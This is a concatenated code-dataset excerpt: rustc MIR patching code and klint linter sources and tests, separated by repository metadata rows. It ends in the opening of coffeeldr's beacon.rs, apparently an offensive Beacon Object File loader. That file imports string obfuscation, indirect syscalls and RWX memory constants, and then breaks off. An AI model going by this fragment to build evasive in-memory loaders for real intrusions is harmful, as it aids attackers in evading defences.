source_info: SourceInfo::outermost(self.body_span),
kind: TerminatorKind::Unreachable,
}),
false,
));
self.unreachable_no_cleanup_block = Some(bb);
bb
}
pub(crate) fn terminate_block(&mut self, reason: UnwindTerminateReason) -> BasicBlock {
if let Some((cached_bb, cached_reason)) = self.terminate_block
&& reason == cached_reason
{
return cached_bb;
}
let bb = self.new_block(BasicBlockData::new(
Some(Terminator {
source_info: SourceInfo::outermost(self.body_span),
kind: TerminatorKind::UnwindTerminate(reason),
}),
true,
));
self.terminate_block = Some((bb, reason));
bb
}
/// Has a replacement of this block's terminator been queued in this patch?
pub(crate) fn is_term_patched(&self, bb: BasicBlock) -> bool {
self.term_patch_map[bb].is_some()
}
/// Universal getter for block data, either it is in 'old' blocks or in patched ones
pub(crate) fn block<'a>(
&'a self,
body: &'a Body<'tcx>,
bb: BasicBlock,
) -> &'a BasicBlockData<'tcx> {
match bb.index().checked_sub(body.basic_blocks.len()) {
Some(new) => &self.new_blocks[new],
None => &body[bb],
}
}
pub(crate) fn terminator_loc(&self, body: &Body<'tcx>, bb: BasicBlock) -> Location {
let offset = self.block(body, bb).statements.len();
Location {
block: bb,
statement_index: offset,
}
}
/// Queues the addition of a new temporary with additional local info.
pub(crate) fn new_local_with_info(
&mut self,
ty: Ty<'tcx>,
span: Span,
local_info: LocalInfo<'tcx>,
) -> Local {
let index = self.next_local;
self.next_local += 1;
let mut new_decl = LocalDecl::new(ty, span);
**new_decl.local_info.as_mut().unwrap_crate_local() = local_info;
self.new_locals.push(new_decl);
Local::new(index)
}
/// Queues the addition of a new temporary.
pub(crate) fn new_temp(&mut self, ty: Ty<'tcx>, span: Span) -> Local {
let index = self.next_local;
self.next_local += 1;
self.new_locals.push(LocalDecl::new(ty, span));
Local::new(index)
}
/// Returns the type of a local that's newly-added in the patch.
pub(crate) fn local_ty(&self, local: Local) -> Ty<'tcx> {
let local = local.as_usize();
assert!(local < self.next_local);
let new_local_idx = self.new_locals.len() - (self.next_local - local);
self.new_locals[new_local_idx].ty
}
/// Queues the addition of a new basic block.
pub(crate) fn new_block(&mut self, data: BasicBlockData<'tcx>) -> BasicBlock {
let block = BasicBlock::new(self.term_patch_map.len());
debug!("MirPatch: new_block: {:?}: {:?}", block, data);
self.new_blocks.push(data);
self.term_patch_map.push(None);
block
}
/// Queues the replacement of a block's terminator.
pub(crate) fn patch_terminator(&mut self, block: BasicBlock, new: TerminatorKind<'tcx>) {
assert!(self.term_patch_map[block].is_none());
debug!("MirPatch: patch_terminator({:?}, {:?})", block, new);
self.term_patch_map[block] = Some(new);
}
/// Queues the insertion of a statement at a given location. The statement
/// currently at that location, and all statements that follow, are shifted
/// down. If multiple statements are queued for addition at the same
/// location, the final statement order after calling `apply` will match
/// the queue insertion order.
///
/// E.g. if we have `s0` at location `loc` and do these calls:
///
/// p.add_statement(loc, s1);
/// p.add_statement(loc, s2);
/// p.apply(body);
///
/// then the final order will be `s1, s2, s0`, with `s1` at `loc`.
pub(crate) fn add_statement(&mut self, loc: Location, stmt: StatementKind<'tcx>) {
debug!("MirPatch: add_statement({:?}, {:?})", loc, stmt);
self.new_statements.push((loc, stmt));
}
/// Like `add_statement`, but specialized for assignments.
pub(crate) fn add_assign(&mut self, loc: Location, place: Place<'tcx>, rv: Rvalue<'tcx>) {
self.add_statement(loc, StatementKind::Assign(Box::new((place, rv))));
}
/// Applies the queued changes.
pub(crate) fn apply(self, body: &mut Body<'tcx>) {
debug!(
"MirPatch: {:?} new temps, starting from index {}: {:?}",
self.new_locals.len(),
body.local_decls.len(),
self.new_locals
);
debug!(
"MirPatch: {} new blocks, starting from index {}",
self.new_blocks.len(),
body.basic_blocks.len()
);
let bbs = if self.term_patch_map.is_empty() && self.new_blocks.is_empty() {
body.basic_blocks.as_mut_preserves_cfg()
} else {
body.basic_blocks.as_mut()
};
bbs.extend(self.new_blocks);
body.local_decls.extend(self.new_locals);
for (src, patch) in self.term_patch_map.into_iter_enumerated() {
if let Some(patch) = patch {
debug!("MirPatch: patching block {:?}", src);
bbs[src].terminator_mut().kind = patch;
}
}
let mut new_statements = self.new_statements;
// This must be a stable sort to provide the ordering described in the
// comment for `add_statement`.
new_statements.sort_by_key(|s| s.0);
let mut delta = 0;
let mut last_bb = START_BLOCK;
for (mut loc, stmt) in new_statements {
if loc.block != last_bb {
delta = 0;
last_bb = loc.block;
}
debug!(
"MirPatch: adding statement {:?} at loc {:?}+{}",
stmt, loc, delta
);
loc.statement_index += delta;
let source_info = Self::source_info_for_index(&body[loc.block], loc);
body[loc.block]
.statements
.insert(loc.statement_index, Statement::new(source_info, stmt));
delta += 1;
}
}
fn source_info_for_index(data: &BasicBlockData<'_>, loc: Location) -> SourceInfo {
match data.statements.get(loc.statement_index) {
Some(stmt) => stmt.source_info,
None => data.terminator().source_info,
}
}
pub(crate) fn source_info_for_location(&self, body: &Body<'tcx>, loc: Location) -> SourceInfo {
let data = self.block(body, loc.block);
Self::source_info_for_index(data, loc)
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/diagnostic_items/out_of_band.rs | src/diagnostic_items/out_of_band.rs | //! Out-of-band attributes attached without source code changes.
use rustc_hir::def_id::{DefId, LOCAL_CRATE};
use rustc_hir::diagnostic_items::DiagnosticItems;
use rustc_middle::middle::exported_symbols::ExportedSymbol;
use rustc_middle::ty::TyCtxt;
pub fn infer_missing_items<'tcx>(tcx: TyCtxt<'tcx>, items: &mut DiagnosticItems) {
if !items.name_to_id.contains_key(&crate::symbol::build_error) {
if let Some(def_id) = infer_build_error_diagnostic_item(tcx) {
super::collect_item(tcx, items, crate::symbol::build_error, def_id);
}
}
}
pub fn infer_build_error_diagnostic_item<'tcx>(tcx: TyCtxt<'tcx>) -> Option<DefId> {
for exported in tcx.exported_non_generic_symbols(LOCAL_CRATE) {
if let ExportedSymbol::NonGeneric(def_id) = exported.0
&& exported.0.symbol_name_for_local_instance(tcx).name == "rust_build_error"
{
return Some(def_id);
}
}
None
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/diagnostic_items/mod.rs | src/diagnostic_items/mod.rs | mod out_of_band;
use std::sync::Arc;
use rustc_data_structures::fx::FxIndexMap;
use rustc_hir::CRATE_OWNER_ID;
use rustc_hir::def_id::{CrateNum, DefId, LOCAL_CRATE};
use rustc_hir::diagnostic_items::DiagnosticItems;
use rustc_middle::ty::TyCtxt;
use rustc_serialize::{Decodable, Encodable};
use rustc_span::{Span, Symbol};
use crate::ctxt::{AnalysisCtxt, QueryValueDecodable};
use crate::{attribute::KlintAttribute, ctxt::PersistentQuery};
#[derive(Diagnostic)]
#[diag(klint_duplicate_diagnostic_item_in_crate)]
struct DuplicateDiagnosticItemInCrate {
#[primary_span]
pub duplicate_span: Option<Span>,
#[note(klint_diagnostic_item_first_defined)]
pub orig_span: Option<Span>,
#[note]
pub different_crates: bool,
pub crate_name: Symbol,
pub orig_crate_name: Symbol,
pub name: Symbol,
}
fn report_duplicate_item(
tcx: TyCtxt<'_>,
name: Symbol,
original_def_id: DefId,
item_def_id: DefId,
) {
let orig_span = tcx.hir_span_if_local(original_def_id);
let duplicate_span = tcx.hir_span_if_local(item_def_id);
tcx.dcx().emit_err(DuplicateDiagnosticItemInCrate {
duplicate_span,
orig_span,
crate_name: tcx.crate_name(item_def_id.krate),
orig_crate_name: tcx.crate_name(original_def_id.krate),
different_crates: (item_def_id.krate != original_def_id.krate),
name,
});
}
fn collect_item(tcx: TyCtxt<'_>, items: &mut DiagnosticItems, name: Symbol, item_def_id: DefId) {
items.id_to_name.insert(item_def_id, name);
if let Some(original_def_id) = items.name_to_id.insert(name, item_def_id) {
if original_def_id != item_def_id {
report_duplicate_item(tcx, name, original_def_id, item_def_id);
}
}
}
memoize!(
pub fn klint_diagnostic_items<'tcx>(
cx: &AnalysisCtxt<'tcx>,
krate_num: CrateNum,
) -> Arc<DiagnosticItems> {
if krate_num != LOCAL_CRATE {
return cx
.sql_load::<klint_diagnostic_items>(krate_num)
.unwrap_or_default();
}
let mut items = DiagnosticItems::default();
let crate_items = cx.hir_crate_items(());
for owner in crate_items.owners().chain(std::iter::once(CRATE_OWNER_ID)) {
for attr in cx.klint_attributes(owner.into()).iter() {
if let KlintAttribute::DiagnosticItem(name) = *attr {
collect_item(cx.tcx, &mut items, name, owner.to_def_id());
}
}
}
out_of_band::infer_missing_items(cx.tcx, &mut items);
let ret = Arc::new(items);
cx.sql_store::<klint_diagnostic_items>(krate_num, ret.clone());
ret
}
);
impl QueryValueDecodable for klint_diagnostic_items {
fn encode_value<'tcx>(value: &Self::Value<'tcx>, cx: &mut crate::serde::EncodeContext<'tcx>) {
value.name_to_id.encode(cx);
}
fn decode_value<'a, 'tcx>(cx: &mut crate::serde::DecodeContext<'a, 'tcx>) -> Self::Value<'tcx> {
let name_to_id = FxIndexMap::decode(cx);
let id_to_name = name_to_id.iter().map(|(&name, &id)| (id, name)).collect();
Arc::new(DiagnosticItems {
name_to_id,
id_to_name,
})
}
}
impl PersistentQuery for klint_diagnostic_items {
type LocalKey<'tcx> = ();
fn into_crate_and_local<'tcx>(key: CrateNum) -> (CrateNum, Self::LocalKey<'tcx>) {
(key, ())
}
}
memoize!(
pub fn klint_all_diagnostic_items<'tcx>(cx: &AnalysisCtxt<'tcx>) -> Arc<DiagnosticItems> {
let mut items = DiagnosticItems::default();
for cnum in cx
.crates(())
.iter()
.copied()
.filter(|cnum| cx.is_user_visible_dep(*cnum))
.chain(std::iter::once(LOCAL_CRATE))
{
for (&name, &def_id) in &cx.klint_diagnostic_items(cnum).name_to_id {
collect_item(cx.tcx, &mut items, name, def_id);
}
}
Arc::new(items)
}
);
impl<'tcx> AnalysisCtxt<'tcx> {
pub fn get_klint_diagnostic_item(&self, name: Symbol) -> Option<DefId> {
self.klint_all_diagnostic_items()
.name_to_id
.get(&name)
.copied()
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/compile-test.rs | tests/compile-test.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
extern crate compiletest_rs as compiletest;
use std::env;
use std::path::PathBuf;
use std::sync::LazyLock;
static PROFILE_PATH: LazyLock<PathBuf> = LazyLock::new(|| {
let current_exe_path = env::current_exe().unwrap();
let deps_path = current_exe_path.parent().unwrap();
let profile_path = deps_path.parent().unwrap();
profile_path.into()
});
fn run_ui_tests(bless: bool) {
let mut config = compiletest::Config {
bless,
edition: Some("2024".into()),
mode: compiletest::common::Mode::Ui,
..Default::default()
};
config.target_rustcflags = Some(
[
"-Zcrate-attr=feature(register_tool)",
"-Zcrate-attr=register_tool(klint)",
"--crate-type=lib",
"-Zcrate-attr=no_std",
"--extern alloc",
"--emit=obj",
"-O",
"-Cdebuginfo=1",
"--cfg=CONFIG_FRAME_WARN=\"2048\"",
]
.join(" "),
);
config.src_base = "tests/ui".into();
config.build_base = PROFILE_PATH.join("test/ui");
config.rustc_path = PROFILE_PATH.join("klint");
config.link_deps(); // Populate config.target_rustcflags with dependencies on the path
compiletest::run_tests(&config);
}
#[test]
fn compile_test() {
let bless = env::var("BLESS").map_or(false, |x| !x.trim().is_empty());
run_ui_tests(bless);
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/dep/bin.rs | tests/dep/bin.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use spin::*;
fn main() {
let lock = Spinlock;
drop(lock);
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/dep/main.rs | tests/dep/main.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use std::env;
use std::path::PathBuf;
use std::sync::LazyLock;
static PROFILE_PATH: LazyLock<PathBuf> = LazyLock::new(|| {
let current_exe_path = env::current_exe().unwrap();
let deps_path = current_exe_path.parent().unwrap();
let profile_path = deps_path.parent().unwrap();
profile_path.into()
});
#[test]
fn run() {
std::process::exit(
std::process::Command::new("tests/dep/run.sh")
.env("KLINT", PROFILE_PATH.join("klint"))
.status()
.unwrap()
.code()
.unwrap(),
);
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/dep/spin.rs | tests/dep/spin.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
pub struct Guard;
impl Drop for Guard {
#[klint::preempt_count(adjust = -1, unchecked)]
fn drop(&mut self) {}
}
pub struct Spinlock;
impl Spinlock {
#[klint::preempt_count(adjust = 1, unchecked)]
pub fn lock(&self) -> Guard {
Guard
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/obligation-resolution.rs | tests/ui/obligation-resolution.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
// This is a regression test which is minimize from ICE when compiling libcore.
pub trait Pattern: Sized {
#[inline]
fn strip_prefix_of(self, _haystack: &str) -> Option<&str> {
let _ = &0;
None
}
}
#[doc(hidden)]
trait MultiCharEq {
}
impl<const N: usize> MultiCharEq for [char; N] {
}
struct MultiCharEqPattern<C: MultiCharEq>(C);
impl<C: MultiCharEq> Pattern for MultiCharEqPattern<C> {
}
impl<const N: usize> Pattern for [char; N] {
#[inline]
fn strip_prefix_of(self, haystack: &str) -> Option<&str> {
MultiCharEqPattern(self).strip_prefix_of(haystack)
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/iflet.rs | tests/ui/iflet.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
pub struct X;
impl Drop for X {
#[klint::preempt_count(expect = 0)]
#[inline(never)]
fn drop(&mut self) {}
}
#[klint::preempt_count(expect = 0..)]
pub fn foo(x: Option<X>) -> Option<X> {
// This control flow only conditionally moved `x`, but it will need dropping anymore
// regardless if this branch is taken.
// It's important that we do not consider the destructor to possibly run at the end of scope.
if let Some(x) = x {
return Some(x);
}
None
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/calltrace.rs | tests/ui/calltrace.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use alloc::vec::Vec;
struct LockOnDrop;
impl Drop for LockOnDrop {
#[klint::preempt_count(adjust = 1, unchecked)]
fn drop(&mut self) {}
}
#[klint::preempt_count(expect = 0)]
fn might_sleep() {}
fn problematic<T>(x: T) {
drop(x);
might_sleep();
}
fn wrapper<T>(x: T) {
problematic(x);
}
pub fn this_is_fine() {
wrapper(Vec::<i32>::new());
}
pub fn this_is_not() {
wrapper(LockOnDrop);
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/box_free.rs | tests/ui/box_free.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
#![feature(allocator_api)]
use alloc::boxed::Box;
use core::alloc::{AllocError, Allocator, Layout};
use core::ptr::NonNull;
struct TestAllocator;
unsafe impl Allocator for TestAllocator {
#[inline]
fn allocate(&self, layout: Layout) -> Result<NonNull<[u8]>, AllocError> {
panic!();
}
#[inline]
#[klint::preempt_count(expect = 0)]
unsafe fn deallocate(&self, ptr: NonNull<u8>, layout: Layout) {}
}
struct SleepAndLockOnDrop;
impl Drop for SleepAndLockOnDrop {
#[klint::preempt_count(adjust = 1, expect = 0, unchecked)]
fn drop(&mut self) {}
}
fn drop_box(x: Box<SleepAndLockOnDrop, TestAllocator>) {}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/stack_frame_size.rs | tests/ui/stack_frame_size.rs | #![deny(klint::stack_frame_too_large)]
#[unsafe(no_mangle)]
fn very_large_frame() {
core::hint::black_box([0; 1024]);
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/drop-array.rs | tests/ui/drop-array.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use alloc::boxed::Box;
struct LockOnDrop;
impl Drop for LockOnDrop {
#[klint::preempt_count(adjust = 1, unchecked)]
fn drop(&mut self) {}
}
struct SleepOnDrop;
impl Drop for SleepOnDrop {
#[klint::preempt_count(expect = 0)]
fn drop(&mut self) {}
}
struct SleepAndLockOnDrop;
impl Drop for SleepAndLockOnDrop {
#[klint::preempt_count(adjust = 1, expect = 0, unchecked)]
fn drop(&mut self) {}
}
#[klint::report_preempt_count]
fn drop_lock(x: Box<[LockOnDrop; 2]>) {}
#[klint::report_preempt_count]
fn drop_sleep(x: Box<[SleepOnDrop; 2]>) {}
fn drop_sleep_and_lock(x: Box<[SleepAndLockOnDrop; 2]>) {}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/function-pointer.rs | tests/ui/function-pointer.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
#[klint::preempt_count(adjust = 1, unchecked)]
fn spin_lock() {}
fn okay() {
}
fn not_okay() {
spin_lock();
}
#[klint::preempt_count(adjust = 0)]
pub fn good() {
let a: fn() = okay;
a();
}
#[klint::preempt_count(adjust = 0)]
pub fn bad() {
let a: fn() = not_okay;
a();
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/annotation.rs | tests/ui/annotation.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
#[klint::preempt_count]
fn a() {}
#[klint::preempt_count()]
fn b() {}
#[klint::preempt_count(adjust = )]
fn c() {}
#[klint::preempt_count(expect = )]
fn d() {}
#[klint::preempt_count(expect = ..)]
fn e() {}
#[klint::preempt_count(unchecked)]
fn f() {}
#[klint::any_context]
fn g() {}
#[klint::atomic_context]
fn h() {}
#[klint::atomic_context_only]
fn i() {}
#[klint::process_context]
fn j() {}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/infinite_recursion.rs | tests/ui/infinite_recursion.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
trait ToOpt: Sized {
fn to_option(&self) -> Option<Self>;
}
impl ToOpt for usize {
fn to_option(&self) -> Option<usize> {
Some(*self)
}
}
impl<T:Clone> ToOpt for Option<T> {
fn to_option(&self) -> Option<Option<T>> {
Some((*self).clone())
}
}
fn function<T:ToOpt + Clone>(counter: usize, t: T) {
if counter > 0 {
function(counter - 1, t.to_option());
//~^ ERROR reached the recursion limit while instantiating `function::<Option<
}
}
pub fn main() {
function(22, 22);
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/recursion.rs | tests/ui/recursion.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use alloc::sync::Arc;
#[klint::preempt_count(expect = 0)]
fn might_sleep() {}
#[klint::preempt_count(expect = 0)]
fn recursive_might_sleep() {
if false {
recursive_might_sleep();
}
might_sleep();
}
fn recursive_might_sleep_unannotated() {
if false {
recursive_might_sleep_unannotated();
}
might_sleep();
}
#[klint::drop_preempt_count(expect = 0)]
struct Recursive {
a: Option<Arc<Recursive>>,
}
impl Drop for Recursive {
fn drop(&mut self) {
might_sleep();
}
}
fn drop_recur(recur: Arc<Recursive>) {}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/upcasting.rs | tests/ui/upcasting.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
#[klint::drop_preempt_count(expect = 0)]
trait A {}
#[klint::drop_preempt_count(expect = 1)]
trait B: A {}
fn upcast(x: &dyn B) -> &dyn A {
x
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/build_error.rs | tests/ui/build_error.rs | unsafe extern "C" {
#[klint::diagnostic_item = "build_error"]
safe fn rust_build_error();
}
macro_rules! build_assert {
($expr:expr) => {
if !$expr {
rust_build_error();
}
}
}
#[inline]
fn inline_call() {
build_assert!(false);
}
#[unsafe(no_mangle)]
fn gen_build_error() {
inline_call();
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/waker.rs | tests/ui/waker.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
#[klint::preempt_count(expect = 0..)]
fn waker_ops(x: &core::task::Waker) {
x.clone().wake();
x.wake_by_ref();
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/vtable.rs | tests/ui/vtable.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use alloc::boxed::Box;
#[klint::preempt_count(adjust = 1, unchecked)]
fn spin_lock() {}
trait MyTrait {
fn foo(&self);
}
struct Good;
impl MyTrait for Good {
fn foo(&self) {}
}
#[klint::preempt_count(adjust = 0)]
pub fn good() {
let a: &'static dyn MyTrait = &Good;
a.foo();
}
struct Bad;
impl MyTrait for Bad {
fn foo(&self) {
spin_lock();
}
}
#[klint::preempt_count(adjust = 0)]
pub fn bad() {
let a: &'static dyn MyTrait = &Bad;
a.foo();
}
struct BadDrop;
impl MyTrait for BadDrop {
fn foo(&self) {}
}
impl Drop for BadDrop {
fn drop(&mut self) {
spin_lock();
}
}
#[klint::preempt_count(adjust = 0)]
pub fn bad_drop() {
let _a: Box<dyn MyTrait> = Box::new(BadDrop);
}
trait AnnotatedTrait {
#[klint::preempt_count(adjust = 1)]
fn foo(&self);
}
struct AnnotatedGood;
impl AnnotatedTrait for AnnotatedGood {
fn foo(&self) {
spin_lock();
}
}
#[klint::preempt_count(adjust = 1)]
pub fn annotated_good() {
let a: &'static dyn AnnotatedTrait = &AnnotatedGood;
a.foo();
}
struct AnnotatedBad;
impl AnnotatedTrait for AnnotatedBad {
fn foo(&self) {}
}
#[klint::preempt_count(adjust = 1)]
pub fn annotated_bad() {
let a: &'static dyn AnnotatedTrait = &AnnotatedBad;
a.foo();
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/adjustment.rs | tests/ui/adjustment.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
struct Guard;
impl Drop for Guard {
#[klint::preempt_count(adjust = -1, unchecked)]
fn drop(&mut self) {}
}
struct Spinlock;
impl Spinlock {
#[klint::preempt_count(adjust = 1, unchecked)]
fn lock(&self) -> Guard {
Guard
}
}
fn test() {
let lock = Spinlock;
if true {
core::mem::forget(lock.lock());
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/tests/ui/drop-slice.rs | tests/ui/drop-slice.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use alloc::boxed::Box;
struct LockOnDrop;
impl Drop for LockOnDrop {
#[klint::preempt_count(adjust = 1, unchecked)]
fn drop(&mut self) {}
}
struct SleepOnDrop;
impl Drop for SleepOnDrop {
#[klint::preempt_count(expect = 0)]
fn drop(&mut self) {}
}
fn drop_lock(x: Box<[LockOnDrop]>) {}
#[klint::report_preempt_count]
fn drop_sleep(x: Box<[SleepOnDrop]>) {}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
joaoviictorti/coffeeldr | https://github.com/joaoviictorti/coffeeldr/blob/45fcea8c7145e4d4afa2fe59950cbb491f80dbc3/src/beacon.rs | src/beacon.rs | use alloc::{
string::{String, ToString},
vec::Vec,
};
use core::{
alloc::Layout,
ffi::{CStr, c_void},
ffi::{c_char, c_int, c_short},
fmt,
ptr::{self, null_mut},
};
use spin::Mutex;
use obfstr::obfstr as s;
use dinvk::{winapis::NtCurrentProcess, syscall};
use dinvk::{types::OBJECT_ATTRIBUTES, hash::jenkins3};
use windows_sys::Win32::{
Security::*,
Foundation::{CloseHandle, HANDLE, STATUS_SUCCESS},
System::{
Threading::*,
WindowsProgramming::CLIENT_ID,
Memory::{
MEM_COMMIT,
MEM_RESERVE,
PAGE_EXECUTE_READWRITE
},
},
};
use crate::error::{CoffeeLdrError, Result};
/// Global output buffer used by Beacon-compatible functions.
static BEACON_BUFFER: Mutex<BeaconOutputBuffer> = Mutex::new(BeaconOutputBuffer::new());
/// A buffer used for managing and collecting output for the beacon.
#[repr(C)]
#[derive(Debug, Clone)]
pub struct BeaconOutputBuffer {
/// Internal buffer that stores the output data as a vector of `c_char`.
pub buffer: Vec<c_char>,
}
impl BeaconOutputBuffer {
/// Creates a new empty output buffer.
const fn new() -> Self {
Self { buffer: Vec::new() }
}
/// Appends raw C-style bytes to the internal buffer.
///
/// Invalid pointers or negative lengths are ignored.
fn append_char(&mut self, s: *mut c_char, len: c_int) {
if s.is_null() || len <= 0 {
return;
}
let tmp = unsafe { core::slice::from_raw_parts(s, len as usize) };
self.buffer.extend_from_slice(tmp);
}
/// Appends plain Rust text to the buffer.
fn append_string(&mut self, s: &str) {
self.buffer.extend(s.bytes().map(|b| b as c_char));
}
/// Returns the current buffer pointer and size, and clears the buffer.
///
/// This behaves exactly like the Beacon BOF runtime.
fn get_output(&mut self) -> (*mut c_char, usize) {
let size = self.buffer.len();
let ptr = self.buffer.as_mut_ptr();
self.buffer.clear();
(ptr, size)
}
/// Clears all output data stored in the buffer.
pub fn clear(&mut self) {
self.buffer.clear();
}
}
impl fmt::Display for BeaconOutputBuffer {
/// Converts the internal buffer into a Rust `String`.
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
let string = self
.buffer
.iter()
